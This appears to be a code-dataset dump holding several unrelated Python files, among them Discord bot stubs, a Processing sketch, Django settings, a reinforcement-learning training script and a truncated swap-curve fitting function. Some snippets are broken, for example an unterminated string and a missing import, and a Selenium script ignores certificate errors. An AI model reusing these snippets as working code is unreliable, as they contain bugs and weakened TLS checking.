id stringlengths 1 8 | text stringlengths 6 1.05M | dataset_id stringclasses 1
value |
|---|---|---|
9603925 | <filename>roleutils/autorole.py
import logging
from typing import Union
import discord
from redbot.core import commands
from redbot.core.bot import Red
from .abc import MixinMeta
from .converters import FuzzyRole
from .utils import is_allowed_by_hierarchy, is_allowed_by_role_hierarchy
log = logging.getLogger("red.phenom4n4n.roleutils.autorole")
class AutoRole(MixinMeta):
"""Manage autoroles and sticky roles."""
async def initialize(self):
log.debug("AutoRole Initialize")
await super().initialize()
@commands.is_owner()
@commands.admin_or_permissions(manage_roles=True)
@commands.bot_has_permissions(manage_roles=True)
@commands.group(name="autorole")
async def _autorole(self, ctx: commands.Context):
"""Manage autoroles and sticky roles."""
@_autorole.command()
async def add(self, ctx: commands.Context, *, role: FuzzyRole):
"""Add a role to be added to all new members on join."""
@_autorole.command()
async def remove(self, ctx: commands.Context, *, role: Union[FuzzyRole, int]):
"""Remove an autorole."""
@_autorole.group(name="humans")
async def _humans(self, ctx: commands.Context):
"""Manage autoroles for humans."""
@_humans.command(name="add")
async def humans_add(self, ctx: commands.Context, *, role: FuzzyRole):
"""Add a role to be added to all new humans on join."""
@_humans.command(name="remove")
async def humans_remove(self, ctx: commands.Context, *, role: Union[FuzzyRole, int]):
"""Remove an autorole for humans."""
@_autorole.group(name="bots")
async def _bots(self, ctx: commands.Context):
"""Manage autoroles for bots."""
@_bots.command(name="add")
async def bots_add(self, ctx: commands.Context, *, role: FuzzyRole):
"""Add a role to be added to all new bots on join."""
@_bots.command(name="remove")
async def bots_remove(self, ctx: commands.Context, *, role: Union[FuzzyRole, int]):
"""Remove an autorole for bots."""
@_autorole.group(invoke_without_command=True, name="sticky")
async def _sticky(self, ctx: commands.Context, true_or_false: bool = None):
"""Toggle whether the bot should reapply roles on member joins and leaves."""
@_sticky.command(aliases=["bl"])
async def blacklist(self, ctx: commands.Context, *, role: FuzzyRole):
"""Blacklist a role from being reapplied on joins."""
@_sticky.command(aliases=["unbl"])
async def unblacklist(self, ctx: commands.Context, *, role: Union[FuzzyRole, int]):
"""Remove a role from the sticky blacklist."""
# @commands.Cog.listener()
async def on_member_join(self, member: discord.Member):
pass
# @commands.Cog.listener()
async def on_member_remove(self, member: discord.Member):
pass
| StarcoderdataPython |
1664 | add_library('pdf')
import random
from datetime import datetime
tileCount = 20
def setup():
global savePDF, actStrokeCap, actRandomSeed, colorLeft, colorRight, alphaLeft, alphaRight
savePDF = False
actStrokeCap = ROUND
actRandomSeed = 0
colorLeft = color(197, 0, 123)
colorRight = color(87, 35, 129)
alphaLeft = 100
alphaRight = 100
def draw():
global savePDF, actStrokeCap, actRandomSeed, colorLeft, colorRight, alphaLeft, alphaRight
if savePDF:
beginRecord(PDF, datetime.now().strftime("%Y%m%d%H%M%S")+".pdf")
background(255)
smooth()
noFill()
strokeCap(actStrokeCap)
random.seed(actRandomSeed)
for gridY in range(tileCount):
for gridX in range(tileCount):
posX = int(width/tileCount*gridX)
posY = int(height/tileCount*gridY)
toggle = random.randint(0,1)
if (toggle == 0):
strokeWeight(mouseX/20)
stroke(colorLeft, alphaLeft)
line(posX, posY, posX+width/tileCount, posY+height/tileCount)
elif (toggle == 1):
strokeWeight(mouseY/20)
stroke(colorRight, alphaRight)
line(posX, posY+width/tileCount, posX+height/tileCount, posY)
if (savePDF):
savePDF = False
endRecord()
def mousePressed():
global savePDF, actStrokeCap, actRandomSeed, colorLeft, colorRight, alphaLeft, alphaRight
actRandomSeed = random.randint(0, 100000)
def keyReleased():
global savePDF, actStrokeCap, actRandomSeed, colorLeft, colorRight, alphaLeft, alphaRight
if (key=='s' or key=='S'):
saveFrame(datetime.now().strftime("%Y%m%d%H%M%S")+".png")
if (key=='p' or key=='P'):
savePDF = True
if key == "1":
actStrokeCap = ROUND
elif key == "2":
actStrokeCap = SQUARE
elif key == "3":
actStrokeCap = PROJECT
elif (key == '4'):
if (colorLeft == color(0)):
colorLeft = color(323, 100, 77)
else:
colorLeft = color(0)
elif (key == '5'):
if (colorRight == color(0)):
colorRight = color(273, 73, 51)
else:
colorRight = color(0)
elif (key == '6'):
if (alphaLeft == 100):
alphaLeft = 50
else:
alphaLeft = 100
elif (key == '7'):
if (alphaRight == 100):
alphaRight = 50
else:
alphaRight = 100
if (key == '0'):
actStrokeCap = ROUND
colorLeft = color(0)
colorRight = color(0)
alphaLeft = 100
alphaRight = 100
| StarcoderdataPython |
6571969 | <reponame>Samples-Playgorunds/Samples.Python<gh_stars>0
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# https://realpython.com/python-statistics/
#import math
#import statistics
#import numpy as np
#import scipy.stats
import pandas as pd
data = pd.read_csv("/Users/katodix/Projects/HolisticWare.Core.Math.Statistics.Descriptive.Sequential/externals/Core.Math.Samples/data/Pejcic_318.csv")
data['ATV'].mean()
data.mean()
statistics.mean(data['ATV'])
statistics.harmonic_mean(data['ATV'])
statistics.geometric_mean(data['ATV'])
| StarcoderdataPython |
3249753 | # -*- coding: utf-8 -*-
"""
Created on Fri Jan 26 16:55:10 2018
@author: bryan.nonni
"""
import os
from selenium import webdriver
# Chrome Location, combines webshots folder to the chrome driver
chrome_location = os.path.join('.', 'chromedriver.exe')
print(chrome_location)
options = webdriver.ChromeOptions()
#options.add_experimental_option("", ['--ignore-certificate-errors'])
options.add_argument("--ignore-certificate-errors")
options.add_argument("--test-type")
options.binarylocation = "usr/bin/chromium
driver = webdriver.Chrome(chrome_options=options)
driver.get('https://www.google.com')
driver.save_screenshot("screenshot.png")
driver.close()
# Driver
#Driver = webdriver.Chrome(chrome_location, chrome_options=options)
#if __name__ == "__main__":
# print("Code is live!") | StarcoderdataPython |
11207605 | from yunionclient.common import base
class ServerSku(base.ResourceBase):
pass
class ServerSkuManager(base.StandaloneManager):
resource_class = ServerSku
keyword = 'serversku'
keyword_plural = 'serverskus'
_columns = ['ID', 'Name', 'Instance_type_family',
'Instance_type_category', 'Cpu_core_count', 'Memory_size_mb',
'Os_name', 'Sys_disk_resizable', 'Attached_disk_type', 'Attached_disk_size_gb',
'Attached_disk_count', 'Data_disk_types', 'Data_disk_max_count', 'Nic_max_count',
'Cloudregion_id', 'Provider', 'Postpaid_status', 'Prepaid_status', 'Created_at']
_admin_columns = []
| StarcoderdataPython |
5108842 | <reponame>Leviathan321/ChessDiagramRecognition
################################################################################
# Print number of files for each dataset
################################################################################
from squares_ids import get_squares_ids_absolute_paths
from relative_to_absolute_path import get_absolute_path
from os import listdir
from os.path import isfile, join, basename
################################################################################
################################################################################
# Set paths:
dataset_diagrams: str = get_absolute_path("../datasets/diagrams", __file__)
################################################################################
################################################################################
def print_status_squares() -> None:
print("************************************************************")
print("S Q U A R E S")
print()
paths: dict = get_squares_ids_absolute_paths()
count_all: int = 0
print("black_square:")
for path in paths:
if "black_square" in path:
number_of_squares = len(
[f for f in listdir(path) if isfile(join(path, f))]
)
count_all += number_of_squares
print("\t" + basename(path), ":", number_of_squares)
print("white_square:")
for path in paths:
if "white_square" in path:
number_of_squares = len(
[f for f in listdir(path) if isfile(join(path, f))]
)
count_all += number_of_squares
print("\t" + basename(path), ":", number_of_squares)
print()
print("All squares:", count_all)
print("************************************************************")
################################################################################
################################################################################
def print_status_diagrams(dataset) -> None:
print("************************************************************")
print("D I A G R A M S")
print()
number_of_diagrams: int = len(
[f for f in listdir(dataset) if isfile(join(dataset, f))]
)
print("diagrams: " + str(number_of_diagrams))
print("************************************************************")
################################################################################
################################################################################
def main():
print_status_diagrams(dataset_diagrams)
print_status_squares()
################################################################################
################################################################################
main()
| StarcoderdataPython |
1845304 | <reponame>ucsd-field-lab/namuti-webapp-template<filename>backend/nameforyourprojectbackend/nameforyourprojectbackend/settings/base.py
import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'corsheaders',
'api.apps.ApiConfig',
'django.contrib.postgres'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'corsheaders.middleware.CorsMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
# 'DIRS': [os.path.join(BASE_DIR, 'src')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.template.context_processors.media',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
ROOT_URLCONF = 'nameforyourprojectbackend.urls'
WSGI_APPLICATION = 'nameforyourprojectbackend.wsgi.application'
# Password validation
# https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
STATIC_URL = '/static/'
# STATICFILES_DIRS = (
# os.path.join(BASE_DIR, 'static'),
# )
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)
MEDIA_URL = '/recordings/'
REST_FRAMEWORK = {
'DEFAULT_VERSIONING_CLASS': 'rest_framework.versioning.NamespaceVersioning',
'DEFAULT_RENDERER_CLASSES': (
'rest_framework.renderers.JSONRenderer',
),
'DEFAULT_PARSER_CLASSES': (
'rest_framework.parsers.JSONParser',
)
}
CORS_ALLOW_METHODS = (
'DELETE',
'GET',
'OPTIONS',
'PATCH',
'POST',
'PUT',
)
CORS_ORIGIN_WHITELIST = (
# '192.168.99.100:3000',
'localhost:3000',
'nameforyourprojectbackend.ucsd.edu',
)
# CSRF_COOKIE_NAME = "XSRF-TOKEN"
CSRF_HEADER_NAME = (
'HTTP_X_CSRFTOKEN'
)
# LOGGING = {
# 'version': 1,
# 'disable_existing_loggers': True,
# 'formatters': {
# 'standard': {
# 'format' : "[%(asctime)s] %(levelname)s [%(name)s:%(lineno)s] %(message)s",
# 'datefmt' : "%d/%b/%Y %H:%M:%S"
# },
# },
# 'handlers': {
# 'null': {
# 'level':'DEBUG',
# 'class':'django.utils.log.NullHandler',
# },
# 'logfile': {
# 'level':'DEBUG',
# 'class':'logging.handlers.RotatingFileHandler',
# 'filename': SITE_ROOT + "/logfile",
# 'maxBytes': 50000,
# 'backupCount': 2,
# 'formatter': 'standard',
# },
# 'console':{
# 'level':'INFO',
# 'class':'logging.StreamHandler',
# 'formatter': 'standard'
# },
# },
# 'loggers': {
# 'django': {
# 'handlers':['console'],
# 'propagate': True,
# 'level':'WARN',
# },
# 'django.db.backends': {
# 'handlers': ['console'],
# 'level': 'DEBUG',
# 'propagate': False,
# },
# 'MYAPP': {
# 'handlers': ['console', 'logfile'],
# 'level': 'DEBUG',
# },
# }
# }
| StarcoderdataPython |
4877275 | from algos.ddpg import DDPG
from algos.td3 import TD3
from algos.sac import SAC
import locale, os, random, torch, time
import numpy as np
from util.env import env_factory, eval_policy, train_normalizer
from util.log import create_logger
from torch.nn.utils.rnn import pad_sequence
class ReplayBuffer():
def __init__(self, state_dim, action_dim, max_size):
self.max_size = int(max_size)
self.state = torch.zeros((self.max_size, state_dim))
self.next_state = torch.zeros((self.max_size, state_dim))
self.action = torch.zeros((self.max_size, action_dim))
self.reward = torch.zeros((self.max_size, 1))
self.not_done = torch.zeros((self.max_size, 1))
self.trajectory_idx = [0]
self.trajectories = 0
self.size = 1
def push(self, state, action, next_state, reward, done):
if self.size == self.max_size:
print("\nBuffer full.")
exit(1)
idx = self.size-1
self.state[idx] = torch.Tensor(state)
self.next_state[idx] = torch.Tensor(next_state)
self.action[idx] = torch.Tensor(action)
self.reward[idx] = reward
self.not_done[idx] = 1 - done
if done:
self.trajectory_idx.append(self.size)
self.trajectories += 1
self.size = min(self.size+1, self.max_size)
def sample_trajectory(self, max_len):
traj_idx = np.random.randint(0, self.trajectories-1)
start_idx = self.trajectory_idx[traj_idx]
end_idx = self.trajectory_idx[traj_idx+1]
#end_idx = start_idx + 1
#while self.not_done[end_idx] == 1 and end_idx - start_idx < max_len:
# end_idx += 1
#end_idx += 1
traj_states = self.state[start_idx:end_idx]
next_states = self.next_state[start_idx:end_idx]
actions = self.action[start_idx:end_idx]
rewards = self.reward[start_idx:end_idx]
not_dones = self.not_done[start_idx:end_idx]
# Return an entire episode
return traj_states, actions, next_states, rewards, not_dones, 1
def sample(self, batch_size, sample_trajectories=False, max_len=1000):
if sample_trajectories:
# Collect raw trajectories from replay buffer
raw_traj = [self.sample_trajectory(max_len) for _ in range(batch_size)]
steps = sum([len(traj[0]) for traj in raw_traj])
# Extract trajectory info into separate lists to be padded and batched
states = [traj[0] for traj in raw_traj]
actions = [traj[1] for traj in raw_traj]
next_states = [traj[2] for traj in raw_traj]
rewards = [traj[3] for traj in raw_traj]
not_dones = [traj[4] for traj in raw_traj]
# Get the trajectory mask for the critic
traj_mask = [torch.ones_like(reward) for reward in rewards]
# Pad all trajectories to be the same length, shape is (traj_len x batch_size x dim)
states = pad_sequence(states, batch_first=False)
actions = pad_sequence(actions, batch_first=False)
next_states = pad_sequence(next_states, batch_first=False)
rewards = pad_sequence(rewards, batch_first=False)
not_dones = pad_sequence(not_dones, batch_first=False)
traj_mask = pad_sequence(traj_mask, batch_first=False)
return states, actions, next_states, rewards, not_dones, steps, traj_mask
else:
idx = np.random.randint(0, self.size, size=batch_size)
return self.state[idx], self.action[idx], self.next_state[idx], self.reward[idx], self.not_done[idx], batch_size, 1
def collect_experience(policy, env, replay_buffer, initial_state, steps, noise=0.2, max_len=1000):
with torch.no_grad():
state = policy.normalize_state(torch.Tensor(initial_state))
if noise is None:
a = policy.forward(state, deterministic=False).numpy()
else:
a = policy.forward(state).numpy() + np.random.normal(0, noise, size=policy.action_dim)
state_t1, r, done, _ = env.step(a)
if done or steps > max_len:
state_t1 = env.reset()
done = True
if hasattr(policy, 'init_hidden_state'):
policy.init_hidden_state()
replay_buffer.push(initial_state, a, state_t1.astype(np.float32), r, done)
return state_t1, r, done
def run_experiment(args):
from policies.critic import FF_Q, LSTM_Q
from policies.actor import FF_Stochastic_Actor, LSTM_Stochastic_Actor, FF_Actor, LSTM_Actor
locale.setlocale(locale.LC_ALL, '')
# wrapper function for creating parallelized envs
env = env_factory(args.env_name)()
random.seed(args.seed)
np.random.seed(args.seed)
torch.manual_seed(args.seed)
if hasattr(env, 'seed'):
env.seed(args.seed)
obs_space = env.observation_space.shape[0]
act_space = env.action_space.shape[0]
replay_buff = ReplayBuffer(obs_space, act_space, args.timesteps)
if args.recurrent:
print('Recurrent ', end='')
q1 = LSTM_Q(obs_space, act_space, env_name=args.env_name)
q2 = LSTM_Q(obs_space, act_space, env_name=args.env_name)
if args.algo == 'sac':
actor = LSTM_Stochastic_Actor(obs_space, act_space, env_name=args.env_name, bounded=True)
else:
actor = LSTM_Actor(obs_space, act_space, env_name=args.env_name)
else:
q1 = FF_Q(obs_space, act_space, env_name=args.env_name)
q2 = FF_Q(obs_space, act_space, env_name=args.env_name)
if args.algo == 'sac':
actor = FF_Stochastic_Actor(obs_space, act_space, env_name=args.env_name, bounded=True)
else:
actor = FF_Actor(obs_space, act_space, env_name=args.env_name)
if args.algo == 'sac':
print('Soft Actor-Critic')
algo = SAC(actor, q1, q2, torch.prod(torch.Tensor(env.reset().shape)), args)
elif args.algo == 'td3':
print('Twin-Delayed Deep Deterministic Policy Gradient')
algo = TD3(actor, q1, q2, args)
elif args.algo == 'ddpg':
print('Deep Deterministic Policy Gradient')
algo = DDPG(actor, q1, args)
print("\tenv: {}".format(args.env_name))
print("\tseed: {}".format(args.seed))
print("\ttimesteps: {:n}".format(args.timesteps))
print("\tactor_lr: {}".format(args.a_lr))
print("\tcritic_lr: {}".format(args.c_lr))
print("\tdiscount: {}".format(args.discount))
print("\ttau: {}".format(args.tau))
print("\tbatch_size: {}".format(args.batch_size))
print("\twarmup period: {:n}".format(args.start_timesteps))
print()
iter = 0
episode_reward = 0
episode_timesteps = 0
# create a tensorboard logging object
logger = create_logger(args)
if args.save_actor is None:
args.save_actor = os.path.join(logger.dir, 'actor.pt')
# Keep track of some statistics for each episode
training_start = time.time()
episode_start = time.time()
episode_loss = 0
update_steps = 0
best_reward = None
#eval_policy(algo.actor, min_timesteps=args.prenormalize_steps, max_traj_len=args.max_traj_len, visualize=False
train_normalizer(algo.actor, args.prenormalize_steps, noise=algo.expl_noise)
# Fill replay buffer, update policy until n timesteps have passed
timesteps = 0
state = env.reset().astype(np.float32)
while timesteps < args.timesteps:
buffer_ready = (algo.recurrent and replay_buff.trajectories > args.batch_size) or (not algo.recurrent and replay_buff.size > args.batch_size)
warmup = timesteps < args.start_timesteps
state, r, done = collect_experience(algo.actor, env, replay_buff, state, episode_timesteps,
max_len=args.traj_len,
noise=algo.expl_noise)
episode_reward += r
episode_timesteps += 1
timesteps += 1
if not buffer_ready or warmup:
iter = 0
# Update the policy once our replay buffer is big enough
if buffer_ready and done and not warmup:
update_steps = 0
if not algo.recurrent:
num_updates = episode_timesteps
else:
num_updates = 1
losses = []
for _ in range(num_updates):
losses.append(algo.update_policy(replay_buff, args.batch_size, traj_len=args.traj_len))
episode_elapsed = (time.time() - episode_start)
episode_secs_per_sample = episode_elapsed / episode_timesteps
actor_loss = np.mean([loss[0] for loss in losses])
critic_loss = np.mean([loss[1] for loss in losses])
update_steps = sum([loss[-1] for loss in losses])
logger.add_scalar(args.env_name + '/actor loss', actor_loss, timesteps - args.start_timesteps)
logger.add_scalar(args.env_name + '/critic loss', critic_loss, timesteps - args.start_timesteps)
logger.add_scalar(args.env_name + '/update steps', update_steps, timesteps - args.start_timesteps)
if args.algo == 'sac':
alpha_loss = np.mean([loss[2] for loss in losses])
logger.add_scalar(args.env_name + '/alpha loss', alpha_loss, timesteps - args.start_timesteps)
completion = 1 - float(timesteps) / args.timesteps
avg_sample_r = (time.time() - training_start)/timesteps
secs_remaining = avg_sample_r * args.timesteps * completion
hrs_remaining = int(secs_remaining//(60*60))
min_remaining = int(secs_remaining - hrs_remaining*60*60)//60
if iter % args.eval_every == 0 and iter != 0:
eval_reward = eval_policy(algo.actor, min_timesteps=1000, verbose=False, visualize=False, max_traj_len=args.traj_len)
logger.add_scalar(args.env_name + '/return', eval_reward, timesteps - args.start_timesteps)
print("evaluation after {:4d} episodes | return: {:7.3f} | timesteps {:9n}{:100s}".format(iter, eval_reward, timesteps - args.start_timesteps, ''))
if best_reward is None or eval_reward > best_reward:
torch.save(algo.actor, args.save_actor)
best_reward = eval_reward
print("\t(best policy so far! saving to {})".format(args.save_actor))
try:
print("episode {:5d} | episode timestep {:5d}/{:5d} | return {:5.1f} | update timesteps: {:7n} | {:3.1f}s/1k samples | approx. {:3d}h {:02d}m remain\t\t\t\t".format(
iter,
episode_timesteps,
args.traj_len,
episode_reward,
update_steps,
1000*episode_secs_per_sample,
hrs_remaining,
min_remaining), end='\r')
except NameError:
pass
if done:
if hasattr(algo.actor, 'init_hidden_state'):
algo.actor.init_hidden_state()
episode_start, episode_reward, episode_timesteps, episode_loss = time.time(), 0, 0, 0
iter += 1
| StarcoderdataPython |
1612426 | # Lint as: python3
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Methods to construct a swap curve.
Building swap curves is a core problem in mathematical finance. Swap
curves are built using the available market data in liquidly traded fixed income
products. These include LIBOR rates, interest rate swaps, forward rate
agreements (FRAs) or exchange traded futures contracts. This module contains
methods to build swap curve from market data.
The algorithm implemented here uses conjugate gradient optimization to minimize
the weighted least squares error between the input present values of the
instruments and the present values computed using the constructed swap curve.
#### References:
[1]: <NAME> and <NAME>. Interest Rate Modeling,
Volume I: Foundations and Vanilla Models. Chapter 6. 2010.
"""
import collections
import tensorflow.compat.v2 as tf
from tf_quant_finance.math import make_val_and_grad_fn
from tf_quant_finance.math import optimizer
from tf_quant_finance.math.interpolation import linear
from tf_quant_finance.rates import swap_curve_common as scc
def swap_curve_fit(float_leg_start_times,
float_leg_end_times,
float_leg_daycount_fractions,
fixed_leg_start_times,
fixed_leg_end_times,
fixed_leg_daycount_fractions,
fixed_leg_cashflows,
present_values,
present_values_settlement_times=None,
float_leg_discount_rates=None,
float_leg_discount_times=None,
fixed_leg_discount_rates=None,
fixed_leg_discount_times=None,
optimize=None,
curve_interpolator=None,
initial_curve_rates=None,
instrument_weights=None,
curve_tolerance=1e-8,
maximum_iterations=50,
dtype=None,
name=None):
"""Constructs the zero swap curve using optimization.
A zero swap curve is a function of time which gives the interest rate that
can be used to project forward rates at arbitrary `t` for the valuation of
interest rate securities.
Suppose we have a set of `N` Interest Rate Swaps (IRS) `S_i` with increasing
expiries whose market prices are known.
Suppose also that the `i`th IRS issues cashflows at times `T_{ij}` where
`1 <= j <= n_i` and `n_i` is the number of cashflows (including expiry)
for the `i`th swap.
Denote by `T_i` the time of final payment for the `i`th swap
(hence `T_i = T_{i,n_i}`). This function estimates a set of rates `r(T_i)`
such that when these rates are interpolated to all other cashflow times,
the computed value of the swaps matches the market value of the swaps
(within some tolerance). Rates at intermediate times are interpolated using
the user specified interpolation method (the default interpolation method
is linear interpolation on rates).
#### Example:
The following example illustrates the usage by building an implied swap curve
from four vanilla (fixed to float) LIBOR swaps.
```python
dtype = np.float64
# Next we will set up LIBOR reset and payment times for four spot starting
# swaps with maturities 1Y, 2Y, 3Y, 4Y. The LIBOR rate spans 6M.
float_leg_start_times = [
np.array([0., 0.5], dtype=dtype),
np.array([0., 0.5, 1., 1.5], dtype=dtype),
np.array([0., 0.5, 1.0, 1.5, 2.0, 2.5], dtype=dtype),
np.array([0., 0.5, 1.0, 1.5, 2.0, 2.5, 3.0, 3.5], dtype=dtype)
]
float_leg_end_times = [
np.array([0.5, 1.0], dtype=dtype),
np.array([0.5, 1., 1.5, 2.0], dtype=dtype),
np.array([0.5, 1.0, 1.5, 2.0, 2.5, 3.0], dtype=dtype),
np.array([0.5, 1.0, 1.5, 2.0, 2.5, 3.0, 3.5, 4.0], dtype=dtype)
]
# Next we will set up start and end times for semi-annual fixed coupons.
fixed_leg_start_times = [
np.array([0., 0.5], dtype=dtype),
np.array([0., 0.5, 1., 1.5], dtype=dtype),
np.array([0., 0.5, 1.0, 1.5, 2.0, 2.5], dtype=dtype),
np.array([0., 0.5, 1.0, 1.5, 2.0, 2.5, 3.0, 3.5], dtype=dtype)
]
fixed_leg_end_times = [
np.array([0.5, 1.0], dtype=dtype),
np.array([0.5, 1., 1.5, 2.0], dtype=dtype),
np.array([0.5, 1.0, 1.5, 2.0, 2.5, 3.0], dtype=dtype),
np.array([0.5, 1.0, 1.5, 2.0, 2.5, 3.0, 3.5, 4.0], dtype=dtype)
]
# Next setup a trivial daycount for floating and fixed legs.
float_leg_daycount = [
np.array([0.5, 0.5], dtype=dtype),
np.array([0.5, 0.5, 0.5, 0.5], dtype=dtype),
np.array([0.5, 0.5, 0.5, 0.5, 0.5, 0.5], dtype=dtype),
np.array([0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5], dtype=dtype)
]
fixed_leg_daycount = [
np.array([0.5, 0.5], dtype=dtype),
np.array([0.5, 0.5, 0.5, 0.5], dtype=dtype),
np.array([0.5, 0.5, 0.5, 0.5, 0.5, 0.5], dtype=dtype),
np.array([0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5], dtype=dtype)
]
fixed_leg_cashflows = [
# 1 year swap with 2.855% semi-annual fixed payments.
np.array([-0.02855, -0.02855], dtype=dtype),
# 2 year swap with 3.097% semi-annual fixed payments.
np.array([-0.03097, -0.03097, -0.03097, -0.03097], dtype=dtype),
# 3 year swap with 3.1% semi-annual fixed payments.
np.array([-0.031, -0.031, -0.031, -0.031, -0.031, -0.031], dtype=dtype),
# 4 year swap with 3.2% semi-annual fixed payments.
np.array([-0.032, -0.032, -0.032, -0.032, -0.032, -0.032, -0.032,
-0.032], dtype=dtype)
]
# The present values of the above IRS.
pvs = np.array([0., 0., 0., 0.], dtype=dtype)
# Initial state of the curve.
initial_curve_rates = np.array([0.01, 0.01, 0.01, 0.01], dtype=dtype)
results = swap_curve_fit(float_leg_start_times, float_leg_end_times,
float_leg_daycount, fixed_leg_start_times,
fixed_leg_end_times, fixed_leg_cashflows,
fixed_leg_daycount, pvs, dtype=dtype,
initial_curve_rates=initial_curve_rates)
#### References:
[1]: <NAME> and <NAME>. Interest Rate Modeling,
Volume I: Foundations and Vanilla Models. Chapter 6. 2010.
Args:
float_leg_start_times: List of `Tensor`s. Each `Tensor` must be of rank 1
and of the same real dtype. They may be of different sizes. Each `Tensor`
represents the beginning of the accrual period for the forward rate which
determines the floating payment. Each element in the list belong to a
unique swap to be used to build the curve.
float_leg_end_times: List of `Tensor`s. Each `Tensor` must be of rank 1 and
and the same shape and of the same real dtype as the corresponding element
in `float_leg_start_times`. Each `Tensor` represents the end of the
accrual period for the forward rate which determines the floating payment.
float_leg_daycount_fractions: List of `Tensor`s. Each `Tensor` must be of
the same shape and type as `float_leg_start_times`. They may be of
different sizes. Each `Tensor` represents the daycount fraction of the
forward rate which determines the floating payment.
fixed_leg_start_times: List of `Tensor`s. Each `Tensor` must be of rank 1
and of the same real dtype. They may be of different sizes. Each `Tensor`
represents the begining of the accrual period fixed coupon.
fixed_leg_end_times: List of `Tensor`s. Each `Tensor` must be of the same
shape and type as `fixed_leg_start_times`. Each `Tensor` represents the
end of the accrual period for the fixed coupon.
fixed_leg_daycount_fractions: List of `Tensor`s. Each `Tensor` must be of
the same shape and type as `fixed_leg_start_times`. Each `Tensor`
represents the daycount fraction applicable for the fixed payment.
fixed_leg_cashflows: List of `Tensor`s. The list must be of the same length
as the `fixed_leg_start_times`. Each `Tensor` must be of rank 1 and of the
same dtype as the `Tensor`s in `fixed_leg_start_times`. The input contains
fixed cashflows at each coupon payment time including notional (if any).
The sign should be negative (positive) to indicate net outgoing (incoming)
cashflow.
present_values: List containing scalar `Tensor`s of the same dtype as
elements of `fixed_leg_cashflows`. The length of the list must be the same
as the length of `fixed_leg_cashflows`. The input contains the market
price of the underlying instruments.
present_values_settlement_times: List containing scalar `Tensor`s of the
same dtype as elements of `present_values`. The length of the list must be
the same as the length of `present_values`. The settlement times for the
present values is the time from now when the instrument is traded to the
time that the purchase price is actually delivered. If not supplied, then
it is assumed that the settlement times are zero for every bond.
Default value: `None` which is equivalent to zero settlement times.
float_leg_discount_rates: Optional `Tensor` of the same dtype as
`initial_discount_rates`. This input contains the continuously compounded
discount rates the will be used to discount the floating cashflows. This
allows the swap curve to constructed using an independent discount curve
(e.g. OIS curve). By default the cashflows are discounted using the curve
that is being constructed.
float_leg_discount_times: Optional `Tensor` of the same dtype and shape as
`float_leg_discount_rates`. This input contains the times corresponding to
the rates specified via the `float_leg_discount_rates`.
fixed_leg_discount_rates: Optional `Tensor` of the same dtype as
`initial_discount_rates`. This input contains the continuously compounded
discount rates the will be used to discount the fixed cashflows. This
allows the swap curve to constructed using an independent discount curve
(e.g. OIS curve). By default the cashflows are discounted using the curve
that is being constructed.
fixed_leg_discount_times: Optional `Tensor` of the same dtype and shape as
`fixed_leg_discount_rates`. This input contains the times corresponding to
the rates specified via the `fixed_leg_discount_rates`.
optimize: Optional Python callable which implements the algorithm used to
minimize the objective function during curve construction. It should have
the following interface:
result = optimize(value_and_gradients_function, initial_position,
tolerance, max_iterations)
`value_and_gradients_function` is a Python callable that accepts a point
as a real `Tensor` and returns a tuple of `Tensor`s of real dtype
containing the value of the function and its gradient at that point.
'initial_position' is a real `Tensor` containing the starting point of the
optimization, 'tolerance' is a real scalar `Tensor` for stopping tolerance
for the procedure and `max_iterations` specifies the maximum number of
iterations.
`optimize` should return a namedtuple containing the items: `position` (a
tensor containing the optimal value), `converged` (a boolean indicating
whether the optimize converged according the specified criteria),
`failed` (a boolean indicating if the optimization resulted in a failure),
`num_iterations` (the number of iterations used), and `objective_value` (
the value of the objective function at the optimal value).
The default value for `optimize` is None and conjugate gradient algorithm
is used.
curve_interpolator: Optional Python callable used to interpolate the zero
swap rates at cashflow times. It should have the following interface:
yi = curve_interpolator(xi, x, y)
`x`, `y`, 'xi', 'yi' are all `Tensors` of real dtype. `x` and `y` are the
sample points and values (respectively) of the function to be
interpolated. `xi` are the points at which the interpolation is
desired and `yi` are the corresponding interpolated values returned by the
function. The default value for `curve_interpolator` is None in which
case linear interpolation is used.
initial_curve_rates: Optional `Tensor` of the same dtype and shape as
`present_values`. The starting guess for the discount rates used to
initialize the iterative procedure.
Default value: `None`. If not supplied, the yields to maturity for the
bonds is used as the initial value.
instrument_weights: Optional 'Tensor' of the same dtype and shape as
`present_values`. This input contains the weight of each instrument in
